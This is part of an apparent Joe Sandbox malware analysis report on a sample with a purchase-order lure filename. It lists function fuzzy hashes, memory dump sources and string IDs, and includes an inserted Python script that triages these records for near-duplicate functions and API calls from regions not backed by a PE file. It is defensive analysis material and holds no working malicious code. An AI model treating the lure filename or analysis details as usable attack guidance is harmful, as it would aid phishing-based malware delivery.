                                                                                                        • Opcode ID: 2651c4f623efb2df48aaa828fa5cfd5cee1a04c2525e7aa80d1fae55b99486e4
                                                                                                        • Instruction ID: 085e7aaa0a27ff748d82e10a195b082246cb418ca799482a1c33451213227027
                                                                                                        • Opcode Fuzzy Hash: 2651c4f623efb2df48aaa828fa5cfd5cee1a04c2525e7aa80d1fae55b99486e4
                                                                                                        • Instruction Fuzzy Hash: 7B91CD317142669FDB169F388854B7E7BB2BF88204F148969E9068B396CF78DC01CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,bq$,bq
                                                                                                        • API String ID: 0-2699258169
                                                                                                        • Opcode ID: 6477b8279975f081088d4faf53a885031d305539637427eec9dfcb0dbcebad2f
                                                                                                        • Instruction ID: dcb2b78047bb4c5bc9cadb8f8834cf168bc9e2554dd3f9844536befa06ff175d
                                                                                                        • Opcode Fuzzy Hash: 6477b8279975f081088d4faf53a885031d305539637427eec9dfcb0dbcebad2f
                                                                                                        • Instruction Fuzzy Hash: 3F81B232A20526EFCB24CF6DD488A7DBBB2FF89200F148569DA05D73A5DB35E841CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q
                                                                                                        • API String ID: 0-2697143702
                                                                                                        • Opcode ID: 56570ebad0f635336ca14418b835bd9217745b0ef20cc9851c46b8958c432b37
                                                                                                        • Instruction ID: b0550a4cfec580835872f3bfafc2f4aa19047e97f8f62075f0dcf711645aa3c0
                                                                                                        • Opcode Fuzzy Hash: 56570ebad0f635336ca14418b835bd9217745b0ef20cc9851c46b8958c432b37
                                                                                                        • Instruction Fuzzy Hash: 2651B031710225AFDF11DF69C844BAEBBE6EB88314F148466EA08CB256DB71CC81DB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xbq$Xbq
                                                                                                        • API String ID: 0-1243427068
                                                                                                        • Opcode ID: dacd988dffc87a498899ce14d153dfe8eef7acb9ed5a10f866e2a91d206eba18
                                                                                                        • Instruction ID: c11646ee0f616e2f6f666cf5a3e3253b4965bb1ebb20d3cc8dc4b4b86f105ab1
                                                                                                        • Opcode Fuzzy Hash: dacd988dffc87a498899ce14d153dfe8eef7acb9ed5a10f866e2a91d206eba18
                                                                                                        • Instruction Fuzzy Hash: 2C31D631B24235A7DF2C896E859527EA5E6BBCC300F144539DA06C7394DFB9C8458791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: LR^q
• API String ID: 0-2625958711
• Opcode ID: 1757b12030057c9d67683d8c08fad4e094f35425597fdd2ec9dad91275d15e7a
• Instruction ID: 368c6e2aaa3799052485173aee0c3830d932b8b05b3cab25ef3b6fb2f0118140
• Opcode Fuzzy Hash: 1757b12030057c9d67683d8c08fad4e094f35425597fdd2ec9dad91275d15e7a
• Instruction Fuzzy Hash: 7A52DA75D01219CFCB54EF64E998B9DBBB2FB88705F1046A9D409A7368DB306E85CF80

Strings
Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: LR^q
• API String ID: 0-2625958711
• Opcode ID: 8a2adf3233f64599751170e90e9080b01182ceeef97428d1b212be289250b1e0
• Instruction ID: 16bc44dfc482f078b187b15df1fdde4c8b4608da73e2c85e1eb9d3f350bf1abe
• Opcode Fuzzy Hash: 8a2adf3233f64599751170e90e9080b01182ceeef97428d1b212be289250b1e0
• Instruction Fuzzy Hash: FD52DA75D01219CFCB54EF64E998B9DBBB2FB88705F1046A9D409A7368DB306E85CF80

APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 06919A6E
Memory Dump Source
• Source File: 00000006.00000002.4147168772.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6910000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6700e08dcf5f80e8fb0c120b3e4896b107f19e7c340727378cd47639c170c7ce
• Instruction ID: 9ba6ac06561d86336b31c14dfc313d85a73c8ad31e9c572238fc86d4f2af2fd0
• Opcode Fuzzy Hash: 6700e08dcf5f80e8fb0c120b3e4896b107f19e7c340727378cd47639c170c7ce
• Instruction Fuzzy Hash: 51117974E0010D9FDB44DFE8D8A4AADBBB5FF88314F248565E904EB641DB70AD45CB60
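The records above are Joe Sandbox's per-function disassembly metadata: each function carries its memory dump source (including whether the region is backed by a PE on disk), the APIs it resolves, and opcode/instruction fuzzy hashes used for similarity matching. Two of the records from the 01220000 dump share an instruction fuzzy hash except for its first two characters, and the 06910000 region is not PE-backed yet references LdrInitializeThunk. As an added example (not code from the report or from Joe Sandbox), the following Python parses records in this layout and surfaces both facts. The positionwise hash distance is an assumed triage heuristic, not Joe Sandbox's own similarity measure; the embedded sample is constructed from three of the records on this page, trimmed to the fields the parser reads.

```python
"""Parse Joe Sandbox per-function similarity records and triage them.
Added example, not code from the report; see the lead-in for what is assumed."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records copied from the report, trimmed to the fields read below.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Similarity
• API ID:
• String ID: LR^q
• Opcode ID: 1757b12030057c9d67683d8c08fad4e094f35425597fdd2ec9dad91275d15e7a
• Instruction Fuzzy Hash: 7A52DA75D01219CFCB54EF64E998B9DBBB2FB88705F1046A9D409A7368DB306E85CF80
Strings
Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Similarity
• API ID:
• String ID: LR^q
• Opcode ID: 8a2adf3233f64599751170e90e9080b01182ceeef97428d1b212be289250b1e0
• Instruction Fuzzy Hash: FD52DA75D01219CFCB54EF64E998B9DBBB2FB88705F1046A9D409A7368DB306E85CF80
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 06919A6E
Memory Dump Source
• Source File: 00000006.00000002.4147168772.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• Opcode ID: 6700e08dcf5f80e8fb0c120b3e4896b107f19e7c340727378cd47639c170c7ce
• Instruction Fuzzy Hash: 51117974E0010D9FDB44DFE8D8A4AADBBB5FF88314F248565E904EB641DB70AD45CB60
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
FIELD_KEYS = {"API ID": "api_id", "String ID": "string_id", "Opcode ID": "opcode_id",
              "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}
SOURCE_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
API_RE = re.compile(r"([\w.]+)\([^)]*\), ref: ([0-9A-Fa-f]+)")


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: str = ""
    based_on_pe: bool = False
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""
    apis: list = field(default_factory=list)     # (API name, call-site address) pairs
    strings: list = field(default_factory=list)


def parse_records(text):
    """Walk the text line by line. The APIs/Strings lists precede the Memory Dump
    Source of the same function, and a record closes at its Instruction Fuzzy Hash
    line, the last field of the Similarity block."""
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                m = API_RE.match(body)
                if m:
                    current.apis.append((m.group(1), m.group(2)))
            elif section == "Strings":
                current.strings.append(body)
            elif section == "Memory Dump Source":
                m = SOURCE_RE.match(body)
                if m:
                    current.source_file, current.offset = m.group(1), m.group(2)
                    current.based_on_pe = m.group(3) == "true"
            else:
                key, _, value = body.partition(":")
                if key in FIELD_KEYS:
                    setattr(current, FIELD_KEYS[key], value.strip())
                if key == "Instruction Fuzzy Hash":
                    records.append(current)
                    current = FunctionRecord()
    return records


def hash_distance(a, b):
    """Differing positions plus any length difference (assumed heuristic, not Joe Sandbox's measure)."""
    return sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))


def near_duplicates(records, max_distance=4):
    """Index pairs whose instruction fuzzy hashes differ in at most max_distance
    positions: one function body at two addresses, or a lightly changed copy."""
    return [(i, j, d) for i in range(len(records)) for j in range(i + 1, len(records))
            if (d := hash_distance(records[i].instruction_fuzzy_hash,
                                   records[j].instruction_fuzzy_hash)) <= max_distance]


def unbacked_api_callers(records):
    """Records from memory with no PE backing that still resolve an API: dump these first."""
    return [r for r in records if not r.based_on_pe and r.apis]
```

Feed `parse_records` the text copied from the report's function list; `near_duplicates` returns the index pairs to compare side by side, and `unbacked_api_callers` lists the regions (here the 06910000 dump) worth dumping and disassembling first. The default `max_distance` is a guess; adjust it only after checking how the hash positions behave on functions you know to be related.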
Strings
Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: (o^q
• API String ID: 0-74704288
• Opcode ID: 81d4e7b846c78c60e108b1eb9643b453c9ddca130a76dd606ee7120e809ad41b
• Instruction ID: 41a16aaef933ffe82a85ea5467d4ee43e7466eb103e59850f1d3a26ed0fe2203
• Opcode Fuzzy Hash: 81d4e7b846c78c60e108b1eb9643b453c9ddca130a76dd606ee7120e809ad41b
• Instruction Fuzzy Hash: D241F331B102149FCB1A9F68D854AAE7BB2FF98210F144569E516DB791CF359D01C790

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 205049639795f61e80f0d392b5ec88d9a1f0392e353f49f82427c2579cc6d73b
• Instruction ID: aace7d5e18b8a4e67c89c5197d1944c2b06ceca40bda87491d8baa691378b347
• Opcode Fuzzy Hash: 205049639795f61e80f0d392b5ec88d9a1f0392e353f49f82427c2579cc6d73b
• Instruction Fuzzy Hash: 1712CD358A1347CFDB502F20E6AD22E7B61FF5F3A37046E18E11F88449DB3501A8CA66

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a92eaa56c6b97e75c767bc2f439eff7f08a78f90bae0e657ba49858858f9fc01
• Instruction ID: 85be8597a275686ab58b0e51e890f3640eabab8979cdfaae1636fa3594015dec
• Opcode Fuzzy Hash: a92eaa56c6b97e75c767bc2f439eff7f08a78f90bae0e657ba49858858f9fc01
• Instruction Fuzzy Hash: 2512CD758A1247CFDB503F20E5AD22E7A61FF5F3A37006E18E11F884499B7501A8CA66

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b43be8fd6eca335457f8e882441c9f2ce6261551e6096443a555cc48b710d116
• Instruction ID: 600938eb6b35a49ba53a7bfa3afde44ac5d83c46c8021261fb33994349c7c774
• Opcode Fuzzy Hash: b43be8fd6eca335457f8e882441c9f2ce6261551e6096443a555cc48b710d116
• Instruction Fuzzy Hash: 8E813731911625AFCF11CF2CC8805AEBFB5EF85324F19C666E9589B351D731E892CBA0

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d22fdcd91b43b841b043b61c412e3fdcd1453db66c1497c8a5b4df146eed6d8a
• Instruction ID: ee3db1904b2f02f4daf2dd23db1e5dbbb50076a3a8402576e312d0d735386b0a
• Opcode Fuzzy Hash: d22fdcd91b43b841b043b61c412e3fdcd1453db66c1497c8a5b4df146eed6d8a
• Instruction Fuzzy Hash: 93718C34720666DFDB25DF2CC884A6E7BE5BF4A600B1501AAEA01CB3B1DB74DC41CB51

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d1ec3ea4f931c452468b1bf16edbcc14bf63824b2a96ae239943aaa0275d908
• Instruction ID: 220a190884c93e2238a7a372df6cb0c9e99661eb2ec5ac33ad35b4e7001bbf5d
• Opcode Fuzzy Hash: 0d1ec3ea4f931c452468b1bf16edbcc14bf63824b2a96ae239943aaa0275d908
• Instruction Fuzzy Hash: 7E510134E00218DFDB14DFA5D994BADBBB2FF88304F208529D80AAB394DB75594ACF40

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f799d73d98e2a592823be3dfce2177ff34ac028e4448f043ed4e4727c097f3bc
• Instruction ID: 55c6a8001b3ff982cbab68d0dcec05c7062bd41723fe613338ec461e7a2b63f0
• Opcode Fuzzy Hash: f799d73d98e2a592823be3dfce2177ff34ac028e4448f043ed4e4727c097f3bc
• Instruction Fuzzy Hash: 0D519374E11218DFDB58DFA9D58499DBBF2FF89310F208169E819AB364DB30A941CF00

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8ce52a5946b01706b8f8c99e0ad23100fa9d51d48382f77953a0b153f3a2671f
• Instruction ID: 3cb4d2928ac78302ea6ee99b002907148929ea987aa2a2218356e161d45671b0
• Opcode Fuzzy Hash: 8ce52a5946b01706b8f8c99e0ad23100fa9d51d48382f77953a0b153f3a2671f
• Instruction Fuzzy Hash: C351C275E11218DFCB08DFB9D48499DBBF2FF89304B209569E809AB324DB35A942CF50

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a7bf6ba2ad9a618956d6439c69eabc8248362764663887975672b6a10e5433d
• Instruction ID: c1d75c9215145a1b62549ae69fb35fbf54a3262779b7fde1a9ef6a55a36f0cd2
• Opcode Fuzzy Hash: 1a7bf6ba2ad9a618956d6439c69eabc8248362764663887975672b6a10e5433d
• Instruction Fuzzy Hash: 0241A731A10269EFCF11CFA8C844B9EBFB2FF49350F048555EA15ABA52D374E914CB54

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 30c918be84f8243eccdadf9997da23c08df21054c4d70e51006f8d36f4d73375
• Instruction ID: e22d9391e400453955534365066bf059b979d37aa78b68f1ee5466176af119b7
• Opcode Fuzzy Hash: 30c918be84f8243eccdadf9997da23c08df21054c4d70e51006f8d36f4d73375
• Instruction Fuzzy Hash: 6E411530A04259EFCB11CF68C804B6FBBF2FB54304F04846AE9158B252DB79DE49CB51

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eab61874ea1400e867f097fb047d0ee6420487baf34f16a423dd097914010466
• Instruction ID: e4274df3ee1adc268cad745cc4412bf44c018678b8dc9e233c43edf334f30144
• Opcode Fuzzy Hash: eab61874ea1400e867f097fb047d0ee6420487baf34f16a423dd097914010466
• Instruction Fuzzy Hash: 9431737165111AEFCF069FA4E854ABF3BA2FB48304F008424F9169B394CB75CD61DB91

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbe8afa3faa5f5ae79864a31c6efccd8632cc86c3843da6c3328499bf2c50cbe
• Instruction ID: 2d764f7dcf51d7961c8123c57b4e04cf9555913d171305f02c23c5079352cd35
• Opcode Fuzzy Hash: dbe8afa3faa5f5ae79864a31c6efccd8632cc86c3843da6c3328499bf2c50cbe
• Instruction Fuzzy Hash: 792107717202226BDF2A1739C858A7E2AE7EFC4749B14403DD606CB3A5EE75CC02D782

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c71f0235ed45ae587255f551aac2111063d934c2a70a6cfd5223e8586ac4c2d
• Instruction ID: 202d3bbdaa1c19d267048494c68be2a06f24ae485bc77c6d0564143ef7aa3234
• Opcode Fuzzy Hash: 0c71f0235ed45ae587255f551aac2111063d934c2a70a6cfd5223e8586ac4c2d
• Instruction Fuzzy Hash: 0821C231320222ABEB295629C454B7E76D7EFC4748F14843DD606CB795EE75CC42D382

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b83bb6c201ec711fef4eb31fa6e0fe2428a5c4f2fe42a381dcc62929ba425f32
• Instruction ID: 34df68f3744f1d6cfdb25c289bbe7bfc7e1e99afbe412be8fada4a89dbcd1999
• Opcode Fuzzy Hash: b83bb6c201ec711fef4eb31fa6e0fe2428a5c4f2fe42a381dcc62929ba425f32
• Instruction Fuzzy Hash: FD313470D05219CFCB05EFA8D9486EEBBB4FF49304F00416AD804BA264EB354A85CBA2

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87734cd364f5a273c65d07e1bdd3bcffe62aa129962e5e0af03c80cfa8a20146
• Instruction ID: 0cdbca2514d0a75dace21ea61d9ba7ed89128c95f13dee04723473dd7a274107
• Opcode Fuzzy Hash: 87734cd364f5a273c65d07e1bdd3bcffe62aa129962e5e0af03c80cfa8a20146
• Instruction Fuzzy Hash: 8421F236B15522AFDB2A9B29D45462EB7A2FFC9B557084569E906CF394CF30CC028780

Memory Dump Source
• Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de6c2865f08602aa9a1bd071248c64e51f4bfe797c90eb8de6541990a90db73c
• Instruction ID: 396e1154057501b36e918875500fbf3494a616746b5fd156b27ea72ab7eed509
• Opcode Fuzzy Hash: de6c2865f08602aa9a1bd071248c64e51f4bfe797c90eb8de6541990a90db73c
                                                                                                        • Instruction Fuzzy Hash: B621B071B10116EFCB14DF38C440AEE37A5EB9D6A4B20C419D94A9B340DB35EA03CBD2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4130896351.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_111d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 90f14bf4eb319ea3b2ebc1fe229cec949bc910cbb5929efab200b6e823adb2c2
                                                                                                        • Instruction ID: a185ac56a180a71209596b1ae559d4ab3fe4f24414cd3c80619b508bb8eb12b5
                                                                                                        • Opcode Fuzzy Hash: 90f14bf4eb319ea3b2ebc1fe229cec949bc910cbb5929efab200b6e823adb2c2
                                                                                                        • Instruction Fuzzy Hash: F8213771504204DFCF19DF68E9C8B26FB65FB84314F20C6BDE8494B25AC736D846CA62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b98c012bf04a66bff292997e190f5648ad68448adc97c218c0dd5af58083c41
                                                                                                        • Instruction ID: 1891c42f428a7e357e2dccbe83ede3e12777a059e444642235ce6d1633a20f1b
                                                                                                        • Opcode Fuzzy Hash: 8b98c012bf04a66bff292997e190f5648ad68448adc97c218c0dd5af58083c41
                                                                                                        • Instruction Fuzzy Hash: F931B379E11209DFCB04EFA8E58899DBBB2FF49304B208469E819AB324D731AD45CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d04de1f4ccdc1908ae718e6b2796e9501f062720c61cd5cd3f1d399d93f5ab2d
                                                                                                        • Instruction ID: 38571e8d527f76efe3049c5e6ec0d50420054ef2189f5dbf747af21ccfec9859
                                                                                                        • Opcode Fuzzy Hash: d04de1f4ccdc1908ae718e6b2796e9501f062720c61cd5cd3f1d399d93f5ab2d
                                                                                                        • Instruction Fuzzy Hash: 9221C231A1511ADFCF169F68E448BBF3BA1EB48214F008028E9158B395CB74CD61CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51c8cdb1af25f355b91d46cfbbdffe194ecfb2ab6bdee6ce5adf03a2f0f8bb2f
                                                                                                        • Instruction ID: bad9234d717def5c114657d4346cf6ced6ecd04b34e7631259586796871f80e7
                                                                                                        • Opcode Fuzzy Hash: 51c8cdb1af25f355b91d46cfbbdffe194ecfb2ab6bdee6ce5adf03a2f0f8bb2f
                                                                                                        • Instruction Fuzzy Hash: 69217C70E01269EFDF09CFA5D550AEEBFB6EF49209F148069E511EA290DB30D981CB20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c382893d8f67e2535037873042ef968859db01b74bf1a79dc819f29b035aad84
                                                                                                        • Instruction ID: 8adcc1df30f69afa8c5ebafeb4182f41eb9dc81bd047e4f57619c254261a38dc
                                                                                                        • Opcode Fuzzy Hash: c382893d8f67e2535037873042ef968859db01b74bf1a79dc819f29b035aad84
                                                                                                        • Instruction Fuzzy Hash: 5E215BB0D0020A9FDB05EFB9D58079EBFB2FB84704F1095A9D1589B369EB705A498F81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f896bcb6a637eab19a8cb87fa229418f0208b3e9b84959277288d0331a067f1e
                                                                                                        • Instruction ID: bd4b81237a80ba1ccd3c8d027847a43ca3cab4cc05b0eca6face4b26b40d0965
                                                                                                        • Opcode Fuzzy Hash: f896bcb6a637eab19a8cb87fa229418f0208b3e9b84959277288d0331a067f1e
                                                                                                        • Instruction Fuzzy Hash: 3D11E536711522AFDB155B2AD454A3EB7A6FFC9A553080568EA06CF360CF31DC028790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 094fa16c93e2045723a95e1de471b441f837b75b9d1e50691ce2953cbb966115
                                                                                                        • Instruction ID: 15a2bea6fc488ed130c5e91a7cf0714dd72511ac741135e4bfa7a05a64240e9c
                                                                                                        • Opcode Fuzzy Hash: 094fa16c93e2045723a95e1de471b441f837b75b9d1e50691ce2953cbb966115
